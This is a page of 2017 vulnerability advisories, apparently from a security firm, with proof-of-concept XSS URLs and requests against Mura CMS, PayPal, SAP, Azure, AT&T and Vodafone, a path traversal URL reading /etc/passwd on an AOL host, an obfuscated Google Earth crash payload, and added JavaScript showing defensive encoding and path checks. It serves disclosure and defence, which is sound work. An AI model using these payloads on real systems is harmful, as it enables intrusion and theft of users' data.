
Advisories 2017

 

2017-001: BlueRiver Mura CMS vulnerable to Stored Cross Site Scripting Attacks via rb parameter.

Original release date: May 30, 2017
Last revised: May 30, 2017
Severity: 7.5 CVSSv2/AV:N/AC:L/AU:N/C:P/I:P/A:P

BACKGROUND

Mura CMS is an open source content management system for CFML, created by Blue River Interactive Group.
Mura has been designed to be used by marketing departments, web designers and developers, and it is widely used by important companies and organizations around the world such as NATO, NASA, GSA, the European Commission, Intel, P&G, USA FDA, USA Social Security Administration, USA Senate, USA Navy, USA Dept of Health and Human Services, USA Dept. of Homeland, Schneider, First Hawaiian Bank, Boeing, Baylor College of Medicine and Michigan State University.

DESCRIPTION

BlueRiver Mura CMS is vulnerable to Stored Cross Site Scripting attacks via the rb parameter.
The stored payload is executed every time a user visits the Mura CMS administration login page.

PROOF OF CONCEPT
########################################
### Stored XSS Request
########################################
GET /path/admin/index.cfm?rb=x%27;alert(document.domain);// HTTP/1.1
Host: vulnerable.host.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: s_vi=[CS]v1|2C5FE38B85311092-6000010DC0007122[CE]; AMCV_9E1005A551ED61CA0A490D45%40AdobeOrg=1099438348%7CMCAID%7C2C5FE38B85311092-6000010DC0007122%7CMCIDTS%7C17313%7CMCMID%7C85409179856262413853165277697928813021%7CMCAAMLH-1496404669%7C6%7CMCAAMB-1496404669%7CNRX38WO0n5BH8Th-nqAG_A%7CMCOPTOUT-1495807069s%7CNONE%7CMCSYNCSOP%7C411-17320%7CvVersion%7C2.1.0; s_pers=%20cpn%3D%7C1653566268691%3B%20ppn%3Dadobe.com%7C1653566268694%3B%20s_amov%3D1%7C1495801669949%3B%20s_fid%3D372E39AA61EA3FA1-198193CA03B92617%7C1559063139263%3B%20s_vs%3D1%7C1495992939272%3B%20gpv%3Dcoldfusion.adobe.com%253Acoldfusion%253Aindex.cfm%253Ablog%7C1495992939278%3B%20s_nr%3D1495991139283-Repeat%7C1527527139283%3B; mbox=session#8092c2d4c21445d6809d0ebd62c80c34#1495801734|PC#8092c2d4c21445d6809d0ebd62c80c34.26_15#1559044671; georouting_presented=true; __CT_Data=gpv=1&apv_100_www20=1&cpv_100_www20=1&rpv_100_www20=1; aam_uuid=85612095538239441673145124797129108819; WRUIDAWS=1240751761843931; CFID=456409; CFTOKEN=e412f04e7813ca1-4149DA5A-5056-A56D-8CE03E8CA1EFA11D; ORIGINALURLTOKEN=9FFF7F6A%2D70C2%2D421D%2DA2013073200D197F; MOBILEFORMAT=false; rb=""; sfdc_session=-; s_sess=%20s_cc%3Dtrue%3B%20s_cpc%3D0%3B%20s_sq%3D%3B%20s_ppv%3D-%252C29%252C29%252C671%3B; aam_uuid=85612095538239441673145124797129108819; s_fid=6DEA32486AB53A9B-168353046F737537; s_cc=true
Connection: close
Upgrade-Insecure-Requests: 1

########################################
### Response and Redirect to Stored XSS
########################################
HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Location: ./?muraAction=clogin.main
Server: Microsoft-IIS/8.0
Generator: Mura CMS
X-Powered-By: ASP.NET
Date: Mon, 29 May 2017 08:31:36 GMT
Connection: close
Content-Length: 0

########################################
### Redirect Request
########################################
GET /path/admin/?muraAction=clogin.main HTTP/1.1
Host: vulnerable.host.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: s_vi=[CS]v1|2C5FE38B85311092-6000010DC0007122[CE]; AMCV_9E1005A551ED61CA0A490D45%40AdobeOrg=1099438348%7CMCAID%7C2C5FE38B85311092-6000010DC0007122%7CMCIDTS%7C17313%7CMCMID%7C85409179856262413853165277697928813021%7CMCAAMLH-1496404669%7C6%7CMCAAMB-1496404669%7CNRX38WO0n5BH8Th-nqAG_A%7CMCOPTOUT-1495807069s%7CNONE%7CMCSYNCSOP%7C411-17320%7CvVersion%7C2.1.0; s_pers=%20cpn%3D%7C1653566268691%3B%20ppn%3Dadobe.com%7C1653566268694%3B%20s_amov%3D1%7C1495801669949%3B%20s_fid%3D372E39AA61EA3FA1-198193CA03B92617%7C1559063139263%3B%20s_vs%3D1%7C1495992939272%3B%20gpv%3Dcoldfusion.adobe.com%253Acoldfusion%253Aindex.cfm%253Ablog%7C1495992939278%3B%20s_nr%3D1495991139283-Repeat%7C1527527139283%3B; mbox=session#8092c2d4c21445d6809d0ebd62c80c34#1495801734|PC#8092c2d4c21445d6809d0ebd62c80c34.26_15#1559044671; georouting_presented=true; __CT_Data=gpv=1&apv_100_www20=1&cpv_100_www20=1&rpv_100_www20=1; aam_uuid=85612095538239441673145124797129108819; WRUIDAWS=1240751761843931; CFID=456409; CFTOKEN=e412f04e7813ca1-4149DA5A-5056-A56D-8CE03E8CA1EFA11D; ORIGINALURLTOKEN=9FFF7F6A%2D70C2%2D421D%2DA2013073200D197F; MOBILEFORMAT=false; rb=""; sfdc_session=-; s_sess=%20s_cc%3Dtrue%3B%20s_cpc%3D0%3B%20s_sq%3D%3B%20s_ppv%3D-%252C29%252C29%252C671%3B; aam_uuid=85612095538239441673145124797129108819; s_fid=6DEA32486AB53A9B-168353046F737537; s_cc=true
Connection: close
Upgrade-Insecure-Requests: 1


########################################
### Redirect Response with Stored XSS
########################################
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Expires: 06 Nov 1994 08:37:34 GMT
Server: Microsoft-IIS/8.0
Generator: Mura CMS
X-Powered-By: ASP.NET
Date: Mon, 29 May 2017 08:31:46 GMT
Connection: close

<!DOCTYPE html>
[...SNIP...]
<!-- Mura Vars -->
<script type="text/javascript">
var htmlEditorType='';
var context='/path';
var themepath='/path/default/includes/themes/CleanCanvasWrap';
var rb='x';alert(document.domain);//';
var siteid='default';
var sessionTimeout=10800;
var activepanel=0;
var activetab=0;
var webroot='C:\\inetpub\\wwwroot';
var fileDelim='\\';
</script>
[...SNIP...]
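
The response above shows why the request works: the value of the rb parameter is copied into a JavaScript string literal inside the inline "Mura Vars" script, and the single quote in the value closes that literal, so everything after it runs as code. The block below is an added example written for this page, not Mura CMS code: a minimal rendering of that script block with the unsafe concatenation beside a hardened version that serialises the value with JSON.stringify and additionally escapes <, >, & and the U+2028/U+2029 line terminators, so the value can neither end the string literal nor close the <script> element. The names toJsLiteral, renderMuraVarsUnsafe, renderMuraVarsSafe and runInlineScript are hypothetical; runInlineScript evaluates the generated script under Node.js with stubbed alert and document objects so the difference can be observed without a browser.

```javascript
// Added example (not Mura CMS code): rendering a request parameter into an inline
// <script> block, the unsafe way seen in the PoC response and a hardened way.

// Serialise an arbitrary value as a JavaScript string literal that is safe to embed
// inside an HTML <script> element. JSON.stringify handles quotes, backslashes and
// control characters; the extra replacements stop the value from closing the
// <script> element ("</script>") or ending the literal with a raw line terminator.
function toJsLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Unsafe: the parameter is concatenated straight into a single-quoted literal,
// which is what produces "var rb='x';alert(document.domain);//';" in the PoC.
function renderMuraVarsUnsafe(rb) {
  return `<script type="text/javascript">\nvar rb='${rb}';\n</script>`;
}

// Hardened: the parameter is emitted as a properly encoded literal.
function renderMuraVarsSafe(rb) {
  return `<script type="text/javascript">\nvar rb=${toJsLiteral(rb)};\n</script>`;
}

// Evaluate the body of the generated <script> with stubbed alert/document objects
// (no browser needed) and report which alert() calls happened and what rb holds.
function runInlineScript(html, domain = 'example.test') {
  const body = html.replace(/^<script[^>]*>/, '').replace(/<\/script>$/, '');
  const alertCalls = [];
  const fakeAlert = (msg) => { alertCalls.push(String(msg)); };
  const fakeDocument = { domain };
  const run = new Function('alert', 'document', `${body}\nreturn rb;`);
  const rb = run(fakeAlert, fakeDocument);
  return { alertCalls, rb };
}

// Constructed input: the exact parameter value from the PoC request above.
const POC_VALUE = "x';alert(document.domain);//";

console.log('unsafe:', JSON.stringify(runInlineScript(renderMuraVarsUnsafe(POC_VALUE))));
console.log('safe:  ', JSON.stringify(runInlineScript(renderMuraVarsSafe(POC_VALUE))));
```

Run it with node: the unsafe rendering reports one alert call and rb equal to 'x', the hardened one reports no call and rb equal to the full parameter value. The rule it illustrates is to encode for the exact context the value is written into (here a JavaScript string inside HTML) at output time; the same applies to the reflected cases further down this page where a value lands inside a quoted JavaScript string.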

BUSINESS IMPACT

An attacker can execute arbitrary HTML or script code in a targeted user's browser; this can be leveraged to steal sensitive information such as user credentials, personal data, etc.

SYSTEMS AFFECTED

This vulnerability was verified in BlueRiver Mura CMS 6.1 running under Adobe ColdFusion.

SOLUTION

Contact vendor for a fix.

REFERENCES

Consult these external references for further information:

  • BlueRiver | Mura

   http://www.getmura.com/

  • OWASP | XSS

   https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29

  • CWE | CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

   https://cwe.mitre.org/data/definitions/79.html

REVISION HISTORY

May 30, 2017: Initial release

DISCLOSURE TIMELINE

May 29, 2017 : Vulnerability acquired by Internet Security Auditors (www.isecauditors.com)
May 30, 2017 : Contact with Google Security Team
June 2, 2017 : Vendor Response/Feedback: this issue has been patched already in the latest 6.1 version

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.

ABOUT

Internet Security Auditors is a Spain-based leader in web application testing, network security, penetration testing, and security compliance implementation and assessment. Our clients include some of the largest companies in areas such as finance, telecommunications, insurance, ITC, etc. We are a vendor-independent provider with deep expertise since 2001. Our R&D efforts include vulnerability research, collaboration on open security projects, whitepapers, presentations, and participation in and promotion of security events. For further information regarding our security services, contact us.

2017-002: Paypal(dot)com self-XSS Vulnerability

Original release date: February 25, 2017
Last revised: February 27, 2017
Discovered by: Fabián Cuchietti
Severity: 2/5 (CVSSv3 Base Metrics)

BACKGROUND

PayPal Holdings, Inc. is an American company operating a worldwide online payments system that supports online money transfers and serves as an electronic alternative to traditional paper methods like checks and money orders.

DESCRIPTION

Paypal (dot) com is affected by a self Cross-Site Scripting vulnerability in the "Reminder Note" field. The vulnerable resource does not properly check the type of the parameters passed to the application through POST requests. This allows malicious users to bypass the sanitizer and execute arbitrary HTML/script code in the context of the victim's browser.

PROOF OF CONCEPT

1) Sign in to your paypal account

2) Go to category: Tools > Forms of Payment

3) Click on Create a new payment format

4) Complete the form and click Submit

5) Go to: Manage payment formats > Edit the created payment format >

6) Memo or "Reminder Note" > Edit > Insert the payload here, i.e.: "><img src=x on error=prompt(document.domain)> > Click on Save

7) The XSS will be executed successfully.

BUSINESS IMPACT

An attacker can execute arbitrary HTML or script code in a targeted user's browser; this can be leveraged to steal sensitive information such as user credentials, personal data, etc.

SYSTEMS AFFECTED

https://www.paypal.com/

SOLUTION

-

REFERENCES

http://www.isecauditors.com
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

CREDITS

This vulnerability has been discovered by Oscar Fabián Cuchietti (ofcuchietti (at) isecauditors (dot) com).

REVISION HISTORY

December 13, 2015 Initial release

DISCLOSURE TIMELINE

February 25, 2017   Vulnerability acquired by Internet Security Auditors (www.isecauditors.com)
February 25, 2017   Contact with Paypal Security Team
February 27, 2017   Vendor Response/Feedback
February 27, 2017   Advisory published.

2017-003: My AOL | Today's News vulnerable to Path Traversal

Original release date: June 26, 2017
Last revised: June 26, 2017
Severity: 7.8 CVSSv2:(AV:N/AC:L/Au:N/C:C/I:N/A:N)

BACKGROUND

AOL Inc. (simply known as AOL, originally known as America Online) is a web portal and online service provider based in New York, a subsidiary of Verizon Communications and a part of Oath. AOL was one of the early pioneers of the Internet in the mid-1990s and the most recognized brand on the web in the U.S. It originally provided a dial-up service to millions of Americans, as well as providing a web portal, e-mail, instant messaging and later a web browser following its purchase of Netscape.

DESCRIPTION

"alertswp.aol.com" is vulnerable to path traversal, so anyone can remotely read files from the server's file system.

PROOF OF CONCEPT

http://alertswp.aol.com/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

BUSINESS IMPACT

An attacker can access files and directories stored outside the web root folder. By manipulating variables that reference files with "dot-dot-slash (../)" sequences and their variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on the file system, including application source code, configuration files and critical system files.
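
The request above only works when the server checks the path before the %2f sequences are decoded, so the .. segments reach the file system untouched. The block below is an added example written for this page, not AOL's code: a Node.js helper that percent-decodes the requested path (repeatedly, so double-encoded forms are caught), canonicalises the dot-dot-slash and backslash variations named in the paragraph above segment by segment, and refuses anything that would climb above the web root. The names fullyDecode and resolveUnderWebroot, the web root /var/www/html and the sample request paths are all constructed for the example.

```javascript
// Added example (not AOL code): canonicalise a requested URL path against a web root
// and refuse anything that resolves outside it, including %2f and double-encoded forms.

// Percent-decode repeatedly so double-encoded sequences (%252e%252e%252f) are caught.
// Returns null for malformed escapes or input that keeps changing after maxRounds.
function fullyDecode(raw, maxRounds = 3) {
  let current = raw;
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try {
      next = decodeURIComponent(current);
    } catch (e) {
      return null; // malformed %-escape: reject rather than guess
    }
    if (next === current) return current; // nothing left to decode
    current = next;
  }
  return null; // still changing after maxRounds: treat as hostile
}

// Resolve a request path to an absolute file path under webroot. Returns null
// when the path is malformed, contains a NUL byte, or escapes the web root.
function resolveUnderWebroot(webroot, requestPath) {
  const decoded = fullyDecode(requestPath);
  if (decoded === null || decoded.includes('\0')) return null;

  // Treat backslashes as separators too, so "..\" variants are normalised alike.
  const parts = decoded.replace(/\\/g, '/').split('/');
  const stack = [];
  for (const part of parts) {
    if (part === '' || part === '.') continue;   // empty or current-directory segment
    if (part === '..') {
      if (stack.length === 0) return null;         // would climb above the web root
      stack.pop();
      continue;
    }
    stack.push(part);
  }
  const root = webroot.replace(/\/+$/, '');
  return stack.length === 0 ? root : `${root}/${stack.join('/')}`;
}

// Constructed sample requests against a constructed web root.
const WEBROOT = '/var/www/html';
const SAMPLES = [
  '/news/today.html',
  '/..%2f..%2f..%2f..%2fetc%2fpasswd',   // the shape of the PoC request above
  '/news%2f..%2f..%2fsecret.txt',
  '/%252e%252e/%252e%252e/etc/passwd',    // double-encoded dot-dot
  '/..%5c..%5cwindows%5cwin.ini',         // backslash variant
  '/index.html%00.png',                    // NUL-byte truncation attempt
];

for (const sample of SAMPLES) {
  const resolved = resolveUnderWebroot(WEBROOT, sample);
  console.log(`${sample} -> ${resolved === null ? 'REJECTED' : resolved}`);
}
```

The important design choice is the order of operations: decode first, canonicalise second, compare against the root last, and fail closed on anything the decoder cannot make sense of. A check that runs on the raw URL sees "..%2f" as an ordinary file name, which is exactly the gap the advisory describes.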

SYSTEMS AFFECTED

Current "alertswp.aol.com" Portal site.

SOLUTION

-

REFERENCES

https://www.owasp.org/index.php/Path_Traversal

REVISION HISTORY

June 26, 2017 : Initial release

DISCLOSURE TIMELINE

June 26, 2017 : Vulnerability acquired by Internet Security Auditors (www.isecauditors.com)
June 26, 2017 : Advisory communicated to AOL security team

2017-008: XSS Reflected found in the SAP events portal.

Original release date: July 26, 2017
Last revised: July 26, 2017
Severity: 4.3 CVSSv2/(AV:N/AC:M/Au:N/C:P/I:N/A:N)

BACKGROUND

SAP is a German multinational software corporation that makes enterprise software to manage business operations and customer relations.

DESCRIPTION

This vulnerability allows arbitrary HTML/script code to be executed in the context of the victim user's browser.

PROOF OF CONCEPT

http://events.sap.com/sapandasug/en/session/pixwptpx.asp?1337`};%3C/script%3E%3Csvg/onload=confirm`1`%3E

BUSINESS IMPACT

An attacker can execute arbitrary HTML or script code in a targeted user's browser; this can be leveraged to steal sensitive information such as user credentials, personal data, etc.

SYSTEMS AFFECTED

http://events.sap.com/

SOLUTION

Contact vendor for a fix.

REFERENCES

Consult these external references for further information:
http://www.isecauditors.com
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

REVISION HISTORY

July 26, 2017 : Initial release

DISCLOSURE TIMELINE

July 26, 2017 : Vulnerability acquired by Internet Security Auditors (www.isecauditors.com).
July 26, 2017 : Contact with SAP Security Team.
August 17, 2017 : SAP confirms the problem is fixed.

2017-010: Google Earth 'QtWebKit4' NULL Pointer Dereference Vulnerability

Original release date: January 20, 2016
Last revised: January 20, 2016
Discovered by: Fabián Cuchietti
Severity: 4/5

BACKGROUND

Google Earth is a virtual globe, map and geographical information program that was originally called EarthViewer 3D created by Keyhole, Inc, a Central Intelligence Agency (CIA) funded company acquired by Google in 2004.

DESCRIPTION

NULL pointer dereference errors are common in C/C++. A pointer is a data type that references a location in memory. Once the value at that location is obtained through the pointer, the pointer is said to have been dereferenced. The NULL pointer dereference weakness occurs when an application dereferences a pointer that is expected to hold a valid address but is instead equal to NULL.

PROOF OF CONCEPT

1) Open Google Earth

2) My Places

3) Right click> Add> Folder

4) Select a name for your folder

5) Description: Here we insert our payload > OK

{Payload: <script type="text/javascript">
    String.prototype.repeat = function( num )
    {return new Array( num + 1 ).join( this );}
    var i=0;
    var r=Math.floor(Math.random()*99999)*9*8*9*9*9*9*9*9*9/9*9;
    var bib=String.fromCharCode(60, 120, 104, 116, 58, 97, 99, 114,
    111, 110, 121, 109, 32, 115, 116, 121, 108, 101, 61, 34, 102, 111,
    110, 116, 58, 49, 48, 48, 48, 48, 48, 37, 32, 102, 105, 120, 101, 100,
    115, 121, 115, 59, 32, 115, 116, 121, 108, 101, 61, 34, 120, 115, 115,
    58, 101, 120, 112, 114, 101, 115, 115, 105, 111, 110, 40, 97, 108, 101,
    114, 116, 40, 49, 41, 41, 34, 32, 32, 45, 109, 111, 122,
    45, 98)+r+String.fromCharCode(105, 110, 100, 105, 110, 103, 58, 117,
    114, 108, 40, 35, 49, 49, 41, 59, 32, 102, 111, 110, 116, 45, 102, 97,
    109, 105, 108, 121, 58, 102, 105, 120, 101, 100, 115, 121, 115, 59, 34,
    62, 49, 32, 49, 60, 47, 120, 104, 116, 58, 97, 99, 114, 111, 110, 121, 109,
    62, 10);
    document.write(bib.repeat(9999999));
   </script> }
  
6) Click the folder created with the payload



DUMP:

FAULTING_IP:
+89cde
00000000 ??              ???

EXCEPTION_RECORD:  ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 00000000
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000008
   Parameter[1]: 00000000
Attempt to execute non-executable address 00000000

PROCESS_NAME:  googleearth.exe

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at "0x%08lx" referenced memory at "0x%08lx". The memory could not be "%s".

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at "0x%08lx" referenced memory at "0x%08lx". The memory could not be "%s".

EXCEPTION_PARAMETER1:  00000008

EXCEPTION_PARAMETER2:  00000000

WRITE_ADDRESS:  00000000

FOLLOWUP_IP:
QtWebKit4+89cde
5c9f9cde ??              ???

FAILED_INSTRUCTION_ADDRESS:
+89cde
00000000 ??              ???

FAULTING_THREAD:  00001044

BUGCHECK_STR:  APPLICATION_FAULT_SOFTWARE_NX_FAULT_NULL

PRIMARY_PROBLEM_CLASS:  SOFTWARE_NX_FAULT_NULL

DEFAULT_BUCKET_ID:  SOFTWARE_NX_FAULT_NULL

LAST_CONTROL_TRANSFER:  from 5c9f9cde to 00000000

STACK_TEXT: 
WARNING: Frame IP not in any known module. Following frames may be wrong.
002cafb8 5c9f9cde 002cb05c 5c9b74f1 5e9c7916 0x0
002cafbc 002cb05c 5c9b74f1 5e9c7916 00000000 QtWebKit4+0x89cde
002cafc0 5c9b74f1 5e9c7916 00000000 00000000 0x2cb05c
002cb05c 00000000 00000000 00000000 00000000 QtWebKit4+0x474f1


STACK_COMMAND:  ~0s; .ecxr ; kb

SYMBOL_STACK_INDEX:  1

SYMBOL_NAME:  qtwebkit4+89cde

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: QtWebKit4

IMAGE_NAME:  QtWebKit4.dll

DEBUG_FLR_IMAGE_TIMESTAMP:  4e010a08

FAILURE_BUCKET_ID:  SOFTWARE_NX_FAULT_NULL_c0000005_QtWebKit4.dll!Unknown

BUSINESS IMPACT

In most cases, NULL pointer dereference errors result in a crash of the application; however, remote code execution is possible under certain circumstances. Depending on the privileges of the application, this weakness can result in a denial of service against the entire system or can be used to gain complete control over it.

SYSTEMS AFFECTED

https://www.google.com/earth/

SOLUTION

-

REFERENCES

http://www.isecauditors.com
https://www.owasp.org/index.php/Null-pointer_dereference
http://cwe.mitre.org/data/definitions/476.html

CREDITS

This vulnerability has been discovered by Oscar Fabián Cuchietti (ofcuchietti (at) isecauditors (dot) com).

REVISION HISTORY

December 13, 2015 Initial release.

DISCLOSURE TIMELINE

December 13, 2015   Vulnerability acquired by Internet Security Auditors (www.isecauditors.com)
December 13, 2015   Contact with Google Security Team
December 14, 2015   Vendor Response/Feedback
January  20, 2016   Advisory published.

2017-012: XSS Reflected found in the Microsoft Azure Marketplace website

Original release date: July 31, 2017
Last revised: July 31, 2017
Severity: 4.3 CVSSv2/(AV:N/AC:M/Au:N/C:P/I:N/A:N)

BACKGROUND

Microsoft Corporation is an American multinational technology company headquartered in Redmond, Washington. It develops, manufactures, licenses, supports and sells computer software, consumer electronics, personal computers, and services.

DESCRIPTION

This vulnerability allows arbitrary HTML/script code to be executed in the context of the victim user's browser.

PROOF OF CONCEPT

https://azuremarketplace.microsoft.com/es-es%22%5Ealert(document.domain)%5E%22/marketplace/

BUSINESS IMPACT

An attacker can execute arbitrary HTML or script code in a targeted user's browser; this can be leveraged to steal sensitive information such as user credentials, personal data, etc.

SYSTEMS AFFECTED

https://azuremarketplace.microsoft.com/

REFERENCES

Consult these external references for further information:
http://www.isecauditors.com
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

REVISION HISTORY

July 31, 2017: Initial release

DISCLOSURE TIMELINE

July 31, 2017: Vulnerability acquired by Internet Security Auditors (www.isecauditors.com).
July 31, 2017: Contact with Microsoft Security Team.

2017-014: XSS Reflected found in the AT&T Reward Center portal

Original release date: July 31, 2017
Last revised: July 31, 2017
Severity: 4.3 CVSSv2/(AV:N/AC:M/Au:N/C:P/I:N/A:N)

BACKGROUND

AT&T Inc. is an American multinational telecommunications conglomerate, headquartered at Whitacre Tower in downtown Dallas, Texas. AT&T is the world's largest telecommunications company. AT&T is the second largest provider of mobile telephone services and the largest provider of fixed telephone services in the United States, and also provides broadband subscription television services through DirecTV; combined with AT&T's legacy U-verse service, this also makes AT&T the largest pay television operator.

DESCRIPTION

This vulnerability allows arbitrary HTML/script code to be executed in the context of the victim user's browser.

PROOF OF CONCEPT

https://rewardcenter.att.com/homee.aspx'^self[0x10f8809.toString`36`](document.domain)^'

BUSINESS IMPACT

An attacker can execute arbitrary HTML or script code in a targeted user's browser; this can be leveraged to steal sensitive information such as user credentials, personal data, etc.

SYSTEMS AFFECTED

https://rewardcenter.att.com/

REFERENCES

Consult these external references for further information:
http://www.isecauditors.com
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

REVISION HISTORY

July 31, 2017: Initial release

DISCLOSURE TIMELINE

July 31, 2017: Vulnerability acquired by Internet Security Auditors (www.isecauditors.com).
July 31, 2017: Contact with AT&T Security Team.

2017-015: XSS Reflected found in the AT&T Reward Center portal

Original release date: July 31, 2017
Last revised: July 31, 2017
Severity: 4.3 CVSSv2/(AV:N/AC:M/Au:N/C:P/I:N/A:N)

BACKGROUND

AT&T Inc. is an American multinational telecommunications conglomerate, headquartered at Whitacre Tower in downtown Dallas, Texas. AT&T is the world's largest telecommunications company. AT&T is the second largest provider of mobile telephone services and the largest provider of fixed telephone services in the United States, and also provides broadband subscription television services through DirecTV; combined with AT&T's legacy U-verse service, this also makes AT&T the largest pay television operator.

DESCRIPTION

These vulnerabilities allow arbitrary HTML/script code to be executed in the context of the victim user's browser.

PROOF OF CONCEPT

http://vietnamese.att.com//english/modals/language-model-page.html?pageUrl=x" >=<svG+++onload="confirm(document.domain)"x="http://www.n.com&pageUrl=x
http://polish.att.com//english/modals/language-model-page.html?pageUrl=x" >=<svG+++onload="confirm(document.domain)"x="http://www.n.com&pageUrl=x
http://japanese.att.com//english/modals/language-model-page.html?pageUrl=x" >=<svG+++onload="confirm(document.domain)"x="http://www.n.com&pageUrl=x

BUSINESS IMPACT

An attacker can execute arbitrary HTML or script code in a targeted user's browser; this can be leveraged to steal sensitive information such as user credentials, personal data, etc.

SYSTEMS AFFECTED

Multilanguage AT&T portal.

REFERENCES

Consult these external references for further information:
http://www.isecauditors.com
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

REVISION HISTORY

July 31, 2017: Initial release

DISCLOSURE TIMELINE

July 31, 2017: Vulnerability acquired by Internet Security Auditors (www.isecauditors.com).
July 31, 2017: Contact with AT&T Security Team.

2017-016: XSS Reflected found in the Vodafone German Shop.

Original release date: July 31, 2017
Last revised: July 31, 2017
Severity: 4.3 CVSSv2 / (AV:N/AC:M/Au:N/C:P/I:N/A:N)

BACKGROUND

Vodafone Group is a British multinational telecommunications company, with headquarters in London.

DESCRIPTION

This vulnerability allows arbitrary HTML/script code to be executed in the context of the victim user's browser.

PROOF OF CONCEPT

https://shop.vodafone.de/Shop/wlan-repeater/?b_id=173818321%27%3bprompt(document.domain,document.cookie)%2f%2f&c_id=kdg_cic_607:fq0_f_csc_speed_wlan&j_id=ConConPer607F

BUSINESS IMPACT

An attacker can execute arbitrary HTML or script code in a targeted user's browser; this can be leveraged to steal sensitive information such as user credentials, personal data, etc.

SYSTEMS AFFECTED

https://shop.vodafone.de/

SOLUTION

-

REFERENCES

Consult these external references for further information:
http://www.isecauditors.com
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

REVISION HISTORY

July 31, 2017 : Initial release

DISCLOSURE TIMELINE

July 31, 2017 : Vulnerability acquired by Internet Security Auditors (www.isecauditors.com).
July 31, 2017 : Contact with Vodafone Deutschland Security Team.

2017-017: XSS Reflected found in a Vodafone Deutschland website.

Original release date: July 31, 2017
Last revised: July 31, 2017
Severity: 4.3 CVSSv2 / (AV:N/AC:M/Au:N/C:P/I:N/A:N)

BACKGROUND

Vodafone Group is a British multinational telecommunications company, with headquarters in London.

DESCRIPTION

This vulnerability allows arbitrary HTML/script code to be executed in the context of the victim user's browser.

PROOF OF CONCEPT

https://mvtc112.vodafone.de/ussa/resetPasswordEMail/resetPasswordEMailFallback.ftel?name={{vm.name}}&partnerId=myvf%27-confirm(document.domain)-%27&errorUrl=%2Fussa%2FresetPasswordEMail%2FresetPasswordEMailFallback.ftel%26partnerId%3Dmyvf

BUSINESS IMPACT

An attacker can execute arbitrary HTML or script code in a targeted user's browser; this can be leveraged to steal sensitive information such as user credentials, personal data, etc.

SYSTEMS AFFECTED

https://mvtc112.vodafone.de/

SOLUTION

-

REFERENCES

Consult these external references for further information:
http://www.isecauditors.com
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

REVISION HISTORY

July 31, 2017 : Initial release

DISCLOSURE TIMELINE

July 31, 2017 : Vulnerability acquired by Internet Security Auditors (www.isecauditors.com).
July 31, 2017 : Contact with Vodafone Deutschland Security Team.
